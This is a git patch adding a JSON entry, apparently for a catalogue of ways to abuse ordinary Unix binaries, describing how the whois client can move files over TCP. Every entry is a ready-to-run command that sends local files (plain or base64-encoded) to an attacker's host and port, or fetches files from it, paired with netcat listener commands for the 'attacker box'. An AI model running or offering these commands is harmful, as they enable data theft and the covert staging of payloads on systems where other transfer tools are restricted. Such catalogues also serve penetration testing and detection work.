From 54ff4f3d532027e23a49a65213602bd5f06b9d6e Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 13:18:28 +0100
Subject: [PATCH] add data for whois

---
 data/whois.json | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 data/whois.json

diff --git a/data/whois.json b/data/whois.json
new file mode 100644
index 0000000..750c6a4
--- /dev/null
+++ b/data/whois.json
@@ -0,0 +1,25 @@
+{
+  "description": "'whois' hangs waiting for the remote peer to close the socket.",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send a text file to a TCP port. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. The file has a trailing '$'\\x0d\\x0a'' and its length is limited by the maximum size of arguments.",
+        "code": "whois -h [host] -p [port] \"`cat [file]`\"\n"
+      },
+      {
+        "description": "Send a binary file to a TCP port. Run 'nc -lp [port] | tr -d $'\\x0d' | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+        "code": "whois -h [host] -p [port] \"`base64 [file]`\"\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch remote text file from a remote TCP port. Run 'nc -lp [port] < [file]' on the attacker box to send the file. The file has instances of '$'\\x0d'' stripped.",
+        "code": "whois -h [host] -p [port] > [file]\n"
+      },
+      {
+        "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | nc -lp [port]' on the attacker box to send the file.",
+        "code": "whois -h [host] -p [port] | base64 -d > [file]\n"
+      }
+    ]
+  }
+}
\ No newline at end of file